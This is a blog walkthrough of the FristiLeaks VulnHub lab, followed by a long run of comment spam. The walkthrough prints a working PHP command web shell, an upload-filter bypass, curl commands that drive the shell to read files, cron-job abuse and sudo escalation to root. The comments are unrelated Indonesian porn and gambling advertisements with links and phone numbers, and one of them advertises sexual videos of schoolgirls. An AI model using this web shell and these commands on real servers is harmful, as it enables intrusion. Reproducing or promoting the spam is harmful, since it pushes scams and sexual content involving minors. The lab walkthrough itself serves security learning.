Thanks Ar0xA for this "vuln"derful image.
This is my second completely self solved and first write up for vulnhub images. So cheers fellow #vulnhub fellas. \m/
With this we were able to enumerate the image and found out that only port 80 was open showing us -
However, the interesting part of this was the availability of robots.txt with 3 directories (/cola, /sisi, /beer), all of which had the same result - This is not the url you were looking for!
This was the guessing game part of vulnhub images, unlike my previous challenge, this time I thought I knew how most of my guesses required to be and viola, we got the right drink - fristi.
Post this was the much obvious looking into the source code
This is my second completely self solved and first write up for vulnhub images. So cheers fellow #vulnhub fellas. \m/
Setup
My (attacker) IP: 192.168.56.102
Vulnerable Image IP: 192.168.56.103
Software setup: Oracle VirtualBox on Kali 2.0
Recon
Like any other challenge, we begin using our classic nmap - nmap -A -p- 192.168.56.103 -oA fristileaks
With this we were able to enumerate the image and found out that only port 80 was open showing us -
However, the interesting part of this was the availability of robots.txt with 3 directories (/cola, /sisi, /beer), all of which had the same result - This is not the url you were looking for!
This was the guessing game part of vulnhub images, unlike my previous challenge, this time I thought I knew how most of my guesses required to be and viola, we got the right drink - fristi.
/fristi
Post this was the much obvious looking into the source code
<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->
At the bottom of the page we found small encoded snippet,
which much obviously directed us to this image.
<!--
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->
This leads us to
By now we can all guess who the user is and what his password would be.
/home/eezeepz
After logging in, the harder portion of the 4 hours started. We now find a file upload page.
From the enumeration, we knew the server was Apache 2.2.15 running with PHP 5.3.3.
This meant the most common config mistake to allow file upload to be x.php.png.
I quickly wrote a 5 line script and uploaded it on the server.
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST["cmd"]);
system($cmd);
echo "</pre>$cmd<pre>";
die;}
?>
The best way to get output from this shell is via curl -
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=ls"
/home/admin
Somehow I didn't mind this interface and didn't bother getting a reverse tcp connection until a later stage.
After this, I went through the regular techniques of traversing until.
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat ../../../notes.txt"
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
</pre>cat ../../../notes.txt<pre>
After going to /home/eezeepz and analyzing the contents, I got hold of
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/eezeepz/notes.txt"
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
</pre>cat /home/eezeepz/notes.txt<pre>
Trying to traverse into /home/admin/ gave me an *Permission Denied* Error. So going through last half of this message again, the path was pretty clear.
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo 'chmod 777 /home/admin'>/tmp/runthis"
Unfortunately, this attempt failed because we didn't read the entire message.
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"
command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo '/home/admin/chmod 777 /home/admin'>/tmp/runthis"
We get,
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"
command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin
executing: /home/admin/chmod 777 /home/admin
/home/fristigod
Analyzing the contents of this directory, we could see a few interesting files - $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptedpass.txt"
mVGZ3O3omkJLmy2pcuTq
</pre>cat /home/admin/cryptedpass.txt<pre>
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptpass.py"
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn<br />
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
</pre>cat /home/admin/cryptpass.py<pre>
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/whoisyourgodnow.txt"
=RFn0AKnlMHMPIzpyuTI0ITG
</pre>cat /home/admin/whoisyourgodnow.txt<pre>
Quickly writing a decoding program (edited the same prog, hence no naming convention followed)
$ cat decryptpass.py
#!/usr/bin/python
import base64,codecs,sys
def encodeString(str):
base64string = codecs.encode(str[::-1], 'rot13') //since English Language has 26 alphabets, we only need to do rot13 to get back the original
return base64.b64decode(base64string) // base64 decoding
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
So decrypting the results -
$ python decryptpass.py mVGZ3O3omkJLmy2pcuTq
thisisalsopw123
$ python decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
LetThereBeFristi!

So now that we have two sets of passwords, we try them on the user accounts. On accessing the /home/ directory, we saw three user profiles - admin, ezzeepz and fristigod. The only major problem was for running a sudo command and elevate privileges, I would require a tty, for which I needed a stable reverse shell and not only a php web shell. After attempting to build a custom simple shell and failing muiltiple times (netcat and telnet were not there in the system so was trying to get a php or pyton reverse tcp connection), I just switched back to my script kiddie nature and used php-reverse-shell to get access into the machine.
/root/
Launching a tty to escalate privileges with sudo can be done with the python one liner (Thank you Pentest monkey, again) $ python -c 'import pty; pty.spawn("/bin/sh")'
After this I was able to figure out the credentials of admin(thisisalsopw123) and fristigod(LetThereBeFristi!).
My hope of Admin being the sudo user was thrashed and on running find / -perm -4000, I pretty much got the idea who the sudo user is (last line - find: `/var/fristigod': Permission denied).
After su fristigod, I ran find / -perm -4000 to find
/var/fristigod/.secret_admin_stuff/doCom
Unfortunately,
bash-4.1$ ./var/fristigod/.secret_admin_stuff/doCom
./var/fristigod/.secret_admin_stuff/doCom
Nice try, but wrong user ;)
traversing into the directory, I figured doCom was accessible only via root perms, but the perms to this folder was given to fristigod. This was the obvious point of escalation. Hence I tried harder,
bash-4.1$ sudo ./doCom
sudo ./doCom
Sorry, user fristigod is not allowed to execute './doCom' as root on localhost.localdomain.
This point I knew I had to run as a different user. On analyzing the /etc/passwd I saw a user named fristi. I knew this was the user. However, I still run
bash-4.1$ sudo -l
sudo -l
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
This was the confirmation. The next command gave me access to this file
bash-4.1$ sudo -u fristi ./doCom
sudo -u fristi ./doCom
Usage: ./program_name terminal_command ...
This was simple now,
bash-4.1$ sudo -u fristi ./doCom /bin/bash
sudo -u fristi ./doCom /bin/bash
bash-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
Pwn'd. Now for the flag -
bash-4.1# cd /root
cd /root
bash-4.1# ls
ls
fristileaks_secrets.txt
bash-4.1# cat fristileaks_secrets.txt
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
And w00t w00t! Fristileaks solved within 4 hours :)
Hope to continue pwn'ing such challenges from Vulnhub.
Nicely That i tend not to make sure equipment. https://imgur.com/a/L1gLDNN http://j32d041fnm.dip.jp http://d9ofrzr7ml.dip.jp https://imgur.com/a/meW0JdB https://imgur.com/a/5gAhmPP http://pxim4saekl.dip.jp https://imgur.com/a/MyOaKhg
ReplyDeleteNONTON BOKEP INDO
ReplyDeleteNONTON BOKEP JEPANG
NONTON BOKEP ASIA
NONTON BOKEP KOREA
NONTON BOKEP BARAT
NONTON BOKEP TERLENGKAP DAN TERBARU
Nonton Film Bokep Terlengkap Bokep Indo | Bokep Jepang | Bokep Barat | Film Bokep | Video Bokep
ReplyDeleteKumpulan Bokep Terupdate Terbaru 2020 ( COLMEK.FUN )
ReplyDeleteNONTON VIDIO BOKEP TERBARU
BOKEP HARDCORE
BOKEP INDO JILBAB
BOKEP BARAT 18+
BOKEP ASIA
BOKEP JEPANG
- ( Nonton Flem Sub Indo Di sini ya TerUPDATE )
CINEPLEX21
INDOXX1
Kumpulan Bokep Terbaru 2020
ReplyDeleteBOKEP JEPANG TERBARU
BOKEP BARAT
BOKEP
Nonton Film BOKEP Lengkap Nya Klik disini ↓↓↓↓↓↓
ReplyDeleteVIDEO BOKEP
BOKEP INDONESIA VIRAL 2020
BOKEP BARAT TERBARU
BOKEP ASIAN TERLENGKAP
BOKEP JEPANG 2020 TERBAIK
FILM BOKEP TERLENGKAP DAN TERUPDATE
FILM BOKEP TERBARU 2020 !!
ReplyDeleteFILM BOKEP
BOKEP KOREA
BOKEP JEPANG TERBARU
BOKEP BARAT
BOKEP INDO
RESULT LENGKAP TOGEL ONLINE KUDALARI SEMARANG !!
ReplyDeleteDATA KUDALARI SEMARANG
KUDA LARI SEMARANG
RESULT KUDALARI
Yuk Gabung di NAGAQQ: AGEN BANDARQ BANDARQ ONLINE ADUQ ONLINE DOMINOQQ TERBAIK
ReplyDeleteYang Merupakan Agen Bandarq, Domino 99, Dan Bandar Poker Online Terpercaya di asia hadir untuk anda semua dengan permainan permainan menarik dan bonus menarik untuk anda semua
Bonus yang diberikan NagaQQ :
* Bonus rollingan 0.5%,setiap senin di bagikannya
* Bonus Refferal 10% + 10%,seumur hidup
* Bonus Jackpot, yang dapat anda dapatkan dengan mudah
* Minimal Depo 15.000
* Minimal WD 20.000
Memegang Gelar atau title sebagai Agen BandarQ Terbaik di masanya
Games Yang di Hadirkan NagaQQ :
* Poker Online
* BandarQ
* Domino99
* Bandar Poker
* Bandar66
* Sakong
* Capsa Susun
* AduQ
* Perang Bacarrat (New Game)
Tersedia Deposit Via pulsa :
Telkomsel & XL
Info Lebih lanjut Kunjungi :
Website : NagaQQ
Facebook : NagaQQ Official
Kontakk : Info NagaQQ
linktree : Agen Judi Online
WHATSAPP 1 : +855977509035
Line : Cs_nagaQQ
TELEGRAM : +855967014811
BACA JUGA BLOGSPORT KAMI YANG LAIN:
agen bandarq terbaik
Winner NagaQQ
Daftar NagaQQ
Agen Poker Online
CrownQQ Agen DominoQQ BandarQ dan Domino99 Online Terbesar
ReplyDeleteYuk Buruan ikutan bermain di website CrownQQ
Sekarang CROWNQQ Memiliki Game terbaru Dan Ternama loh...
9 permainan :
=> Poker
=> Bandar Poker
=> Domino99
=> BandarQ
=> AduQ
=> Sakong
=> Capsa Susun
=> Bandar 66
=> Perang Baccarat (NEW GAME)
=> Bonus Refferal 20%
=> Bonus Turn Over 0,5%
=> Minimal Depo 20.000
=> Minimal WD 20.000
=> 100% Member Asli
=> Pelayanan DP & WD 24 jam
=> Livechat Kami 24 Jam Online
=> Bisa Dimainkan Di Hp Android0619679319
=> Di Layani Dengan 5 Bank Terbaik
=> 1 User ID 9 Permainan Menarik
Ayo gabung sekarang juga hanya dengan
mengklick Agen BandarQ
Link Resmi CrownQQ:
- idcrownqq.com
- idcrownqq.net
- idcrownqq.org
- idcrownqq.info
Info Lebih lanjut Kunjungi :
Website : CrownQQ
Daftar CrownQQ : Poker Online
WHATSAPP : +855882357563
Line : CS CROWNQQ
Facebook : CrownQQ Official
Kemenangan CrownQQ : Agen BandarQ
GUDANG NYA FILM BOKEP / MUKASANGE.SITE
ReplyDeleteBOKEP INDO 2020
BOKEP BARAT 2020
BOKEP JEPANG 2020
BOKEP ASIA 2020
BOKEP KOREA 2020
FILM SEMI 2020
SITUS NONTON FILM
Kumpulan Bokep Terupdate Terbaru 2020
ReplyDeleteNONTON VIDIO BOKEP TERBARU
BOKEP HARDCORE
BOKEP INDO JILBAB
BOKEP BARAT 18+
BOKEP ASIA
BOKEP JEPANG
FILM BOKEP TERBARU DAN TERLENGKAP 2020 !!
ReplyDeleteBOKEP INDO
BOKEP BARAT
BOKEP JEPANG
BOKEP KOREA
Join yuk di chanelku yang seger...
ReplyDeletebanyak film terbaru loh...
STREAMING NONTON BOKEP GRATIS
Kumpulan BOKEP Terlengkap Terbaru Terpopuler & Ter-Update By SUKABOKEP
SUKABOKEP
BOKEP INDO NGENTOT ASIK
BOKEP BARAT NGENTOT MANTAP
BOKEP JEPANG NGENTOT NIKMAT
BOKEP KOREA NGENTOT PUAS
FILM SEMI NGENTOT SERU
Kumpulan Bokep Terupdate Terbaru 2020 BOKEPJAV.FUN
ReplyDeleteNONTON VIDIO BOKEP TERBARU
BOKEP HD
BOKEP INDO JILBAB
BOKEP BARAT
BOKEP INDO
BOKEP JEPANG
Link BOKEP Terbaru 2020
ReplyDeleteVIDEO BOKEP
BOKEP INDONESIA
BOKEP BARAT
BOKEP ASIAN
BOKEP JEPANG
FILM BOKEP TERLENGKAP DAN TERUPDATE
KUMPULAN VIDEO BOKEP INDO, JEPANG, BARAT, ASIA, ABG SMP & SMA PECAH PERAWAN KORBAN PACAR MEMEK MULUS MASIH RAPET , DESAHAN KENIKMATAN TERBARU DAN TERUPDATE 2020 FREE DOWNLOAD
ReplyDeleteBOKEP INDO
BOKEP VIRAL
SITUS NONTON BOKEP VIRAL 2020
ReplyDeleteBOKEP BARAT
BOKEP JEPANG TERBARU
FILM BOKEP TERBARU DAN TERLENGKAP !!
ReplyDeleteFILM BOKEP TERBARU
BOKEP JEPANG TERBARU
BOKEP INDO VIRAL 2020
Nonton Film BOKEP Lengkap Nya Klik disini ↓↓↓↓↓↓
ReplyDeleteVIDEO BOKEP
BOKEP VIRAL
Nonton Film INDOXXI Lengkap Nya Klik disini ↓↓↓↓↓↓
BIOSKOP ONLINE